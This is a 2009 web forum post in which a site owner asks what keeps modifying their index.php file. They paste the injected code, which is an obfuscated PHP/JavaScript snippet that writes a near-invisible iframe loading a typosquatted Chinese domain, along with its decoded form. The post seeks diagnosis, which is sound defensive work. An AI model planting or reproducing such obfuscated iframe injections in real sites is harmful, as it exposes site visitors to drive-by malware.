mysterious iframes injected into my index file
Posted: Mon Jul 06, 2009 4:11 pm
Hey guys,
I haven't run across this problem before, but seemingly randomly, something keeps modifying my index.php file. Whatever is doing it removes my onload event from the body tag (this is what clued me into a change being made) and then it appends a javascript at the bottom of the page.
I understand that this is likely malicious, but what is modifying my page? The entire site is PHP and there is only 1 user entry form to send us an email. The rest of my code appears intact. Should I be going through all my code with a fine tooth comb or would you suspect a problem on my web hosts end? There are no public folders and this site has been online for almost 4 years with no problems until now. It also appears its ONLY the index.php file being changed, the rest of the site seems untouched.
I haven't run across this problem before, but seemingly randomly, something keeps modifying my index.php file. Whatever is doing it removes my onload event from the body tag (this is what clued me into a change being made) and then it appends a javascript at the bottom of the page.
Code: Select all
<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';?>
# Translated:
# <script>document.write(<iframe src="http://microsotf.cn" width=1 height = 2></iframe>);</script>